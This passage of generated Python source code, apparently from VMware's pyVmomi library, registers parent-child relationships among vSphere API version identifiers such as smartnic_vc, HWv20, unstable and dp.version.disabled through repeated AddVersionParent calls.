AddVersionParent("vim.version.smartnic_vc", "vim.version.version12")
AddVersionParent("vim.version.smartnic_vc", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.smartnic_vc", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.smartnic_vc", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.smartnic_vc", "vim.version.v7_0")
AddVersionParent("vim.version.smartnic_vc", "vim.version.version8")
AddVersionParent("vim.version.smartnic_vc", "vim.version.version9")
AddVersionParent("vim.version.smartnic_vc", "vim.version.version6")
AddVersionParent("vim.version.smartnic_vc", "vim.version.version7")
AddVersionParent("vim.version.smartnic_vc", "vim.version.version1")
AddVersionParent("vim.version.smartnic_vc", "vim.version.version4")
AddVersionParent("vim.version.smartnic_vc", "vim.version.version5")
AddVersionParent("vim.version.smartnic_vc", "vim.version.version2")
AddVersionParent("vim.version.smartnic_vc", "vim.version.version3")
AddVersionParent("vim.version.smartnic_vc", "vim.version.smartnic_vc")
AddVersionParent("vim.version.HWv20", "vmodl.query.version.version4")
AddVersionParent("vim.version.HWv20", "vmodl.query.version.version3")
AddVersionParent("vim.version.HWv20", "vmodl.query.version.version2")
AddVersionParent("vim.version.HWv20", "vmodl.query.version.version1")
AddVersionParent("vim.version.HWv20", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.HWv20", "vmodl.version.version0")
AddVersionParent("vim.version.HWv20", "vmodl.version.version1")
AddVersionParent("vim.version.HWv20", "vmodl.version.version2")
AddVersionParent("vim.version.HWv20", "vim.version.v6_9_1")
AddVersionParent("vim.version.HWv20", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.HWv20", "vim.version.v6_8_7")
AddVersionParent("vim.version.HWv20", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.HWv20", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.HWv20", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.HWv20", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.HWv20", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.HWv20", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.HWv20", "vim.version.version13")
AddVersionParent("vim.version.HWv20", "vim.version.version14")
AddVersionParent("vim.version.HWv20", "vim.version.version15")
AddVersionParent("vim.version.HWv20", "vim.version.version10")
AddVersionParent("vim.version.HWv20", "vim.version.version11")
AddVersionParent("vim.version.HWv20", "vim.version.version12")
AddVersionParent("vim.version.HWv20", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.HWv20", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.HWv20", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.HWv20", "vim.version.v7_0")
AddVersionParent("vim.version.HWv20", "vim.version.version8")
AddVersionParent("vim.version.HWv20", "vim.version.version9")
AddVersionParent("vim.version.HWv20", "vim.version.version6")
AddVersionParent("vim.version.HWv20", "vim.version.version7")
AddVersionParent("vim.version.HWv20", "vim.version.version1")
AddVersionParent("vim.version.HWv20", "vim.version.version4")
AddVersionParent("vim.version.HWv20", "vim.version.version5")
AddVersionParent("vim.version.HWv20", "vim.version.version2")
AddVersionParent("vim.version.HWv20", "vim.version.version3")
AddVersionParent("vim.version.HWv20", "vim.version.HWv20")
AddVersionParent("vim.version.unstable", "vmodl.query.version.version4")
AddVersionParent("vim.version.unstable", "vmodl.query.version.version3")
AddVersionParent("vim.version.unstable", "vmodl.query.version.version2")
AddVersionParent("vim.version.unstable", "vmodl.query.version.version1")
AddVersionParent("vim.version.unstable", "vim.version.pcieHotPlugOfFPT")
AddVersionParent("vim.version.unstable", "vim.version.pr1429825")
AddVersionParent("vim.version.unstable", "vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT")
AddVersionParent("vim.version.unstable", "vim.version.MemoryTiering")
AddVersionParent("vim.version.unstable", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.unstable", "vim.version.FCD_VRA_SUPPORT")
AddVersionParent("vim.version.unstable", "vim.version.guestDetailedData")
AddVersionParent("vim.version.unstable", "vim.version.SGX_MPA_VMCheck")
AddVersionParent("vim.version.unstable", "vim.version.vdcs")
AddVersionParent("vim.version.unstable", "vmodl.version.version0")
AddVersionParent("vim.version.unstable", "vim.version.NFS_VMKPORTBIND")
AddVersionParent("vim.version.unstable", "vmodl.version.version1")
AddVersionParent("vim.version.unstable", "vmodl.version.version2")
AddVersionParent("vim.version.unstable", "vim.version.v6_9_1")
AddVersionParent("vim.version.unstable", "vim.version.VMC_NFS_SUPPORT")
AddVersionParent("vim.version.unstable", "vim.version.NsxLiveUpdate")
AddVersionParent("vim.version.unstable", "vim.version.VDS_ReadOnlyDisk")
AddVersionParent("vim.version.unstable", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.unstable", "vim.version.vVol_datastore_scalability")
AddVersionParent("vim.version.unstable", "vim.version.AssignHwCompositeDev")
AddVersionParent("vim.version.unstable", "vim.version.v6_8_7")
AddVersionParent("vim.version.unstable", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.unstable", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.unstable", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.unstable", "vim.version.VQAT")
AddVersionParent("vim.version.unstable", "vim.version.VCDP_NestedFilters")
AddVersionParent("vim.version.unstable", "vim.version.nativeSnapshot")
AddVersionParent("vim.version.unstable", "vim.version.hostProfiles")
AddVersionParent("vim.version.unstable", "vim.version.GraphicsDRS")
AddVersionParent("vim.version.unstable", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.unstable", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.unstable", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.unstable", "vim.version.hwh")
AddVersionParent("vim.version.unstable", "vim.version.version13")
AddVersionParent("vim.version.unstable", "vim.version.version14")
AddVersionParent("vim.version.unstable", "vim.version.version15")
AddVersionParent("vim.version.unstable", "vim.version.VSAN2_Configure")
AddVersionParent("vim.version.unstable", "vim.version.DRS_LB_REASONCODE")
AddVersionParent("vim.version.unstable", "vim.version.gosCrashRemediation")
AddVersionParent("vim.version.unstable", "vim.version.VCSOF_173")
AddVersionParent("vim.version.unstable", "vim.version.pciSriovExtendedID")
AddVersionParent("vim.version.unstable", "vim.version.vmxnet3UPT")
AddVersionParent("vim.version.unstable", "vim.version.version10")
AddVersionParent("vim.version.unstable", "vim.version.version11")
AddVersionParent("vim.version.unstable", "vim.version.VMcrypt_IntegrityProtection")
AddVersionParent("vim.version.unstable", "vim.version.version12")
AddVersionParent("vim.version.unstable", "vim.version.pciDeviceExt")
AddVersionParent("vim.version.unstable", "vim.version.toolsOffHost")
AddVersionParent("vim.version.unstable", "vim.version.hostCertificateManagement")
AddVersionParent("vim.version.unstable", "vim.version.vmMisc")
AddVersionParent("vim.version.unstable", "vim.version.VLCM_QuickLaunchPreload")
AddVersionParent("vim.version.unstable", "vim.version.LSI2PVSCSI")
AddVersionParent("vim.version.unstable", "vim.version.ProvisioningEventRefresh")
AddVersionParent("vim.version.unstable", "vim.version.OVF_SINGLEDEPLOY_API")
AddVersionParent("vim.version.unstable", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.unstable", "vim.version.pr1803450")
AddVersionParent("vim.version.unstable", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.unstable", "vim.version.VMcrypt_OnlineVMEncryption")
AddVersionParent("vim.version.unstable", "vim.version.FT_VBS_SUPPORT")
AddVersionParent("vim.version.unstable", "vim.version.WCP_FaultDomains")
AddVersionParent("vim.version.unstable", "vim.version.dnd")
AddVersionParent("vim.version.unstable", "vim.version.optional_virtual_disks")
AddVersionParent("vim.version.unstable", "vim.version.hwh2_0")
AddVersionParent("vim.version.unstable", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.unstable", "vim.version.VM_OP_NOTIFICATION_TO_APP_V1")
AddVersionParent("vim.version.unstable", "vim.version.EventsOrdering")
AddVersionParent("vim.version.unstable", "vim.version.PMemV2")
AddVersionParent("vim.version.unstable", "vim.version.v7_0")
AddVersionParent("vim.version.unstable", "vim.version.FileLockInfo_GSS34")
AddVersionParent("vim.version.unstable", "vim.version.version8")
AddVersionParent("vim.version.unstable", "vim.version.version9")
AddVersionParent("vim.version.unstable", "vim.version.version6")
AddVersionParent("vim.version.unstable", "vim.version.version7")
AddVersionParent("vim.version.unstable", "vim.version.DiskGroupVMC")
AddVersionParent("vim.version.unstable", "vim.version.TrustAuthority_V4")
AddVersionParent("vim.version.unstable", "vim.version.version1")
AddVersionParent("vim.version.unstable", "vim.version.version4")
AddVersionParent("vim.version.unstable", "vim.version.version5")
AddVersionParent("vim.version.unstable", "vim.version.SRIOVValidNumVFs")
AddVersionParent("vim.version.unstable", "vim.version.version2")
AddVersionParent("vim.version.unstable", "vim.version.version3")
AddVersionParent("vim.version.unstable", "vim.version.NDU_VSPHERE_HA_INTEGRATION")
AddVersionParent("vim.version.unstable", "vim.version.VmxRebootPowerOff")
AddVersionParent("vim.version.unstable", "vim.version.ClusteredEsx_V1")
AddVersionParent("vim.version.unstable", "vim.version.fourKnStorageSupport")
AddVersionParent("vim.version.unstable", "vim.version.resetportstatistics")
AddVersionParent("vim.version.unstable", "vim.version.batchRenameSupport")
AddVersionParent("vim.version.unstable", "vim.version.VM_CLONE_SWITCH_HOST_EMM")
AddVersionParent("vim.version.unstable", "vim.version.SGX_MPA_HostReg")
AddVersionParent("vim.version.unstable", "vim.version.GreenMetrics")
AddVersionParent("vim.version.unstable", "vim.version.hostVendorSpecificStatus")
AddVersionParent("vim.version.unstable", "vim.version.VMcrypt_V4")
AddVersionParent("vim.version.unstable", "vim.version.hostAccessManager")
AddVersionParent("vim.version.unstable", "vim.version.ocmSupportedForReconfigure")
AddVersionParent("vim.version.unstable", "vim.version.VirtualTopo")
AddVersionParent("vim.version.unstable", "vim.version.Tools_Update_Health")
AddVersionParent("vim.version.unstable", "vim.version.CPU_Scheduler_Info")
AddVersionParent("vim.version.unstable", "vim.version.VM_CLONE_REKEY_TPM")
AddVersionParent("vim.version.unstable", "vim.version.FCD_CATALOG_HEALTH")
AddVersionParent("vim.version.unstable", "vim.version.smartnic_vc")
AddVersionParent("vim.version.unstable", "vim.version.HWv20")
AddVersionParent("vim.version.unstable", "vim.version.unstable")
AddVersionParent("vim.version.unstable", "vim.version.FT_DRS_METRO_CLUSTER")
AddVersionParent("vim.version.unstable", "vim.version.VSAN_DeltaCompEnsureDurability")
AddVersionParent("vim.version.unstable", "vim.version.bmcInfo")
AddVersionParent("vim.version.unstable", "vim.version.vHT")
AddVersionParent("vim.version.unstable", "vim.version.ClusterConfigManagerV2")
AddVersionParent("vim.version.unstable", "vim.version.smartnic_network")
AddVersionParent("vim.version.unstable", "vim.version.DVX")
AddVersionParent("vim.version.unstable", "vim.version.VmcExternalStorageSupport")
AddVersionParent("vim.version.unstable", "vim.version.PodVMOnVDS")
AddVersionParent("vim.version.unstable", "vim.version.ClusterConfigManagerTransition")
AddVersionParent("vim.version.unstable", "vim.version.LiveUpdate")
AddVersionParent("vim.version.unstable", "vim.version.Vmfs_Unmap_Ultralow_Rate")
AddVersionParent("vim.version.unstable", "vim.version.VMcrypt3_KeyCustomAttribute")
AddVersionParent("vim.version.unstable", "vim.version.E2ENativeNVMeSupport")
AddVersionParent("vim.version.unstable", "vim.version.FCD_PERFORMANCE")
AddVersionParent("vim.version.unstable", "vim.version.SPBM_DISK_PROV_VIA_POLICY")
AddVersionParent("vim.version.unstable", "vim.version.nsx_uens_u2")
AddVersionParent("dp.version.disabled", "vmodl.query.version.version4")
AddVersionParent("dp.version.disabled", "vmodl.query.version.version3")
AddVersionParent("dp.version.disabled", "vmodl.query.version.version2")
AddVersionParent("dp.version.disabled", "vmodl.query.version.version1")
AddVersionParent("dp.version.disabled", "vim.version.pcieHotPlugOfFPT")
AddVersionParent("dp.version.disabled", "vim.version.pr1429825")
AddVersionParent("dp.version.disabled", "vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT")
AddVersionParent("dp.version.disabled", "dp.version.VSPHERE_DP_TELEMETRY")
AddVersionParent("dp.version.disabled", "vim.version.MemoryTiering")
AddVersionParent("dp.version.disabled", "vim.version.v7_0_1_1")
AddVersionParent("dp.version.disabled", "vim.version.FCD_VRA_SUPPORT")
AddVersionParent("dp.version.disabled", "vim.version.guestDetailedData")
AddVersionParent("dp.version.disabled", "vim.version.SGX_MPA_VMCheck")
AddVersionParent("dp.version.disabled", "vim.version.vdcs")
AddVersionParent("dp.version.disabled", "vmodl.version.version0")
AddVersionParent("dp.version.disabled", "vim.version.NFS_VMKPORTBIND")
AddVersionParent("dp.version.disabled", "vmodl.version.version1")
AddVersionParent("dp.version.disabled", "vmodl.version.version2")
AddVersionParent("dp.version.disabled", "dp.version.version1")
AddVersionParent("dp.version.disabled", "vim.version.v6_9_1")
AddVersionParent("dp.version.disabled", "vim.version.VMC_NFS_SUPPORT")
AddVersionParent("dp.version.disabled", "vim.version.NsxLiveUpdate")
AddVersionParent("dp.version.disabled", "vim.version.VDS_ReadOnlyDisk")
AddVersionParent("dp.version.disabled", "vim.version.v7_0_0_2")
AddVersionParent("dp.version.disabled", "vim.version.vVol_datastore_scalability")
AddVersionParent("dp.version.disabled", "vim.version.AssignHwCompositeDev")
AddVersionParent("dp.version.disabled", "vim.version.v6_8_7")
AddVersionParent("dp.version.disabled", "vmodl.reflect.version.version1")
AddVersionParent("dp.version.disabled", "vmodl.reflect.version.version2")
AddVersionParent("dp.version.disabled", "vim.version.v8_0_0_0")
AddVersionParent("dp.version.disabled", "vim.version.VQAT")
AddVersionParent("dp.version.disabled", "vim.version.VCDP_NestedFilters")
AddVersionParent("dp.version.disabled", "vim.version.nativeSnapshot")
AddVersionParent("dp.version.disabled", "vim.version.hostProfiles")
AddVersionParent("dp.version.disabled", "vim.version.GraphicsDRS")
AddVersionParent("dp.version.disabled", "vim.version.v7_0_3_1")
AddVersionParent("dp.version.disabled", "vim.version.v7_0_3_2")
AddVersionParent("dp.version.disabled", "vim.version.v7_0_3_0")
AddVersionParent("dp.version.disabled", "vim.version.hwh")
AddVersionParent("dp.version.disabled", "vim.version.version13")
AddVersionParent("dp.version.disabled", "vim.version.version14")
AddVersionParent("dp.version.disabled", "vim.version.version15")
AddVersionParent("dp.version.disabled", "dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT")
AddVersionParent("dp.version.disabled", "vim.version.VSAN2_Configure")
AddVersionParent("dp.version.disabled", "vim.version.DRS_LB_REASONCODE")
AddVersionParent("dp.version.disabled", "vim.version.gosCrashRemediation")
AddVersionParent("dp.version.disabled", "vim.version.VCSOF_173")
AddVersionParent("dp.version.disabled", "vim.version.pciSriovExtendedID")
AddVersionParent("dp.version.disabled", "vim.version.vmxnet3UPT")
AddVersionParent("dp.version.disabled", "vim.version.version10")
AddVersionParent("dp.version.disabled", "vim.version.version11")
AddVersionParent("dp.version.disabled", "vim.version.VMcrypt_IntegrityProtection")
AddVersionParent("dp.version.disabled", "vim.version.version12")
AddVersionParent("dp.version.disabled", "vim.version.pciDeviceExt")
AddVersionParent("dp.version.disabled", "vim.version.toolsOffHost")
AddVersionParent("dp.version.disabled", "vim.version.hostCertificateManagement")
AddVersionParent("dp.version.disabled", "vim.version.vmMisc")
AddVersionParent("dp.version.disabled", "vim.version.VLCM_QuickLaunchPreload")
AddVersionParent("dp.version.disabled", "vim.version.LSI2PVSCSI")
AddVersionParent("dp.version.disabled", "vim.version.ProvisioningEventRefresh")
AddVersionParent("dp.version.disabled", "vim.version.OVF_SINGLEDEPLOY_API")
AddVersionParent("dp.version.disabled", "vim.version.v7_0_2_0")
AddVersionParent("dp.version.disabled", "vim.version.pr1803450")
AddVersionParent("dp.version.disabled", "vim.version.v7_0_2_1")
AddVersionParent("dp.version.disabled", "vim.version.VMcrypt_OnlineVMEncryption")
AddVersionParent("dp.version.disabled", "vim.version.FT_VBS_SUPPORT")
AddVersionParent("dp.version.disabled", "vim.version.WCP_FaultDomains")
AddVersionParent("dp.version.disabled", "vim.version.dnd")
AddVersionParent("dp.version.disabled", "vim.version.optional_virtual_disks")
AddVersionParent("dp.version.disabled", "vim.version.hwh2_0")
AddVersionParent("dp.version.disabled", "vim.version.v7_0_1_0")
AddVersionParent("dp.version.disabled", "vim.version.VM_OP_NOTIFICATION_TO_APP_V1")
AddVersionParent("dp.version.disabled", "vim.version.EventsOrdering")
AddVersionParent("dp.version.disabled", "vim.version.PMemV2")
AddVersionParent("dp.version.disabled", "vim.version.v7_0")
AddVersionParent("dp.version.disabled", "vim.version.FileLockInfo_GSS34")
AddVersionParent("dp.version.disabled", "vim.version.version8")
AddVersionParent("dp.version.disabled", "vim.version.version9")
AddVersionParent("dp.version.disabled", "vim.version.version6")
AddVersionParent("dp.version.disabled", "vim.version.version7")
AddVersionParent("dp.version.disabled", "vim.version.DiskGroupVMC")
AddVersionParent("dp.version.disabled", "vim.version.TrustAuthority_V4")
AddVersionParent("dp.version.disabled", "vim.version.version1")
AddVersionParent("dp.version.disabled", "vim.version.version4")
AddVersionParent("dp.version.disabled", "vim.version.version5")
AddVersionParent("dp.version.disabled", "vim.version.SRIOVValidNumVFs")
AddVersionParent("dp.version.disabled", "vim.version.version2")
AddVersionParent("dp.version.disabled", "vim.version.version3")
AddVersionParent("dp.version.disabled", "vim.version.NDU_VSPHERE_HA_INTEGRATION")
AddVersionParent("dp.version.disabled", "vim.version.VmxRebootPowerOff")
AddVersionParent("dp.version.disabled", "vim.version.ClusteredEsx_V1")
AddVersionParent("dp.version.disabled", "vim.version.fourKnStorageSupport")
AddVersionParent("dp.version.disabled", "vim.version.resetportstatistics")
AddVersionParent("dp.version.disabled", "vim.version.batchRenameSupport")
AddVersionParent("dp.version.disabled", "dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT")
AddVersionParent("dp.version.disabled", "vim.version.VM_CLONE_SWITCH_HOST_EMM")
AddVersionParent("dp.version.disabled", "dp.version.unstable")
AddVersionParent("dp.version.disabled", "vim.version.SGX_MPA_HostReg")
AddVersionParent("dp.version.disabled", "vim.version.GreenMetrics")
AddVersionParent("dp.version.disabled", "vim.version.hostVendorSpecificStatus")
AddVersionParent("dp.version.disabled", "vim.version.VMcrypt_V4")
AddVersionParent("dp.version.disabled", "vim.version.hostAccessManager")
AddVersionParent("dp.version.disabled", "vim.version.ocmSupportedForReconfigure")
AddVersionParent("dp.version.disabled", "dp.version.v8_0_0_0")
AddVersionParent("dp.version.disabled", "vim.version.VirtualTopo")
AddVersionParent("dp.version.disabled", "vim.version.Tools_Update_Health")
AddVersionParent("dp.version.disabled", "vim.version.CPU_Scheduler_Info")
AddVersionParent("dp.version.disabled", "vim.version.VM_CLONE_REKEY_TPM")
AddVersionParent("dp.version.disabled", "vim.version.FCD_CATALOG_HEALTH")
AddVersionParent("dp.version.disabled", "vim.version.smartnic_vc")
AddVersionParent("dp.version.disabled", "vim.version.HWv20")
AddVersionParent("dp.version.disabled", "vim.version.unstable")
AddVersionParent("dp.version.disabled", "dp.version.disabled")
AddVersionParent("dp.version.disabled", "vim.version.FT_DRS_METRO_CLUSTER")
AddVersionParent("dp.version.disabled", "vim.version.VSAN_DeltaCompEnsureDurability")
AddVersionParent("dp.version.disabled", "vim.version.bmcInfo")
AddVersionParent("dp.version.disabled", "vim.version.disabled")
AddVersionParent("dp.version.disabled", "vim.version.vHT")
AddVersionParent("dp.version.disabled", "vim.version.ClusterConfigManagerV2")
AddVersionParent("dp.version.disabled", "vim.version.smartnic_network")
AddVersionParent("dp.version.disabled", "vim.version.DVX")
AddVersionParent("dp.version.disabled", "vim.version.VmcExternalStorageSupport")
AddVersionParent("dp.version.disabled", "vim.version.PodVMOnVDS")
AddVersionParent("dp.version.disabled", "vim.version.ClusterConfigManagerTransition")
AddVersionParent("dp.version.disabled", "vim.version.LiveUpdate")
AddVersionParent("dp.version.disabled", "vim.version.Vmfs_Unmap_Ultralow_Rate")
AddVersionParent("dp.version.disabled", "vim.version.VMcrypt3_KeyCustomAttribute")
AddVersionParent("dp.version.disabled", "vim.version.E2ENativeNVMeSupport")
AddVersionParent("dp.version.disabled", "vim.version.FCD_PERFORMANCE")
AddVersionParent("dp.version.disabled", "vim.version.SPBM_DISK_PROV_VIA_POLICY")
AddVersionParent("dp.version.disabled", "vim.version.nsx_uens_u2")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vmodl.query.version.version4")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vmodl.query.version.version3")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vmodl.query.version.version2")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vmodl.query.version.version1")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vmodl.version.version0")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vmodl.version.version1")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vmodl.version.version2")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.v6_9_1")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.v6_8_7")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.version13")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.version14")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.version15")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.version10")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.version11")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.version12")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.v7_0")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.version8")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.version9")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.version6")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.version7")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.version1")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.version4")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.version5")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.version2")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.version3")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.FT_DRS_METRO_CLUSTER")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vmodl.query.version.version4")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vmodl.query.version.version3")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vmodl.query.version.version2")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vmodl.query.version.version1")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vmodl.version.version0")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vmodl.version.version1")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vmodl.version.version2")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.v6_9_1")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.v6_8_7")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.version13")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.version14")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.version15")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.version10")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.version11")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.version12")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.v7_0")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.version8")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.version9")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.version6")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.version7")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.version1")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.version4")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.version5")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.version2")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.version3")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.VSAN_DeltaCompEnsureDurability")
AddVersionParent("vim.version.bmcInfo", "vmodl.query.version.version4")
AddVersionParent("vim.version.bmcInfo", "vmodl.query.version.version3")
AddVersionParent("vim.version.bmcInfo", "vmodl.query.version.version2")
AddVersionParent("vim.version.bmcInfo", "vmodl.query.version.version1")
AddVersionParent("vim.version.bmcInfo", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.bmcInfo", "vmodl.version.version0")
AddVersionParent("vim.version.bmcInfo", "vmodl.version.version1")
AddVersionParent("vim.version.bmcInfo", "vmodl.version.version2")
AddVersionParent("vim.version.bmcInfo", "vim.version.v6_9_1")
AddVersionParent("vim.version.bmcInfo", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.bmcInfo", "vim.version.v6_8_7")
AddVersionParent("vim.version.bmcInfo", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.bmcInfo", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.bmcInfo", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.bmcInfo", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.bmcInfo", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.bmcInfo", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.bmcInfo", "vim.version.version13")
AddVersionParent("vim.version.bmcInfo", "vim.version.version14")
AddVersionParent("vim.version.bmcInfo", "vim.version.version15")
AddVersionParent("vim.version.bmcInfo", "vim.version.version10")
AddVersionParent("vim.version.bmcInfo", "vim.version.version11")
AddVersionParent("vim.version.bmcInfo", "vim.version.version12")
AddVersionParent("vim.version.bmcInfo", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.bmcInfo", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.bmcInfo", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.bmcInfo", "vim.version.v7_0")
AddVersionParent("vim.version.bmcInfo", "vim.version.version8")
AddVersionParent("vim.version.bmcInfo", "vim.version.version9")
AddVersionParent("vim.version.bmcInfo", "vim.version.version6")
AddVersionParent("vim.version.bmcInfo", "vim.version.version7")
AddVersionParent("vim.version.bmcInfo", "vim.version.version1")
AddVersionParent("vim.version.bmcInfo", "vim.version.version4")
AddVersionParent("vim.version.bmcInfo", "vim.version.version5")
AddVersionParent("vim.version.bmcInfo", "vim.version.version2")
AddVersionParent("vim.version.bmcInfo", "vim.version.version3")
AddVersionParent("vim.version.bmcInfo", "vim.version.bmcInfo")
AddVersionParent("vim.version.disabled", "vmodl.query.version.version4")
AddVersionParent("vim.version.disabled", "vmodl.query.version.version3")
AddVersionParent("vim.version.disabled", "vmodl.query.version.version2")
AddVersionParent("vim.version.disabled", "vmodl.query.version.version1")
AddVersionParent("vim.version.disabled", "vim.version.pcieHotPlugOfFPT")
AddVersionParent("vim.version.disabled", "vim.version.pr1429825")
AddVersionParent("vim.version.disabled", "vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT")
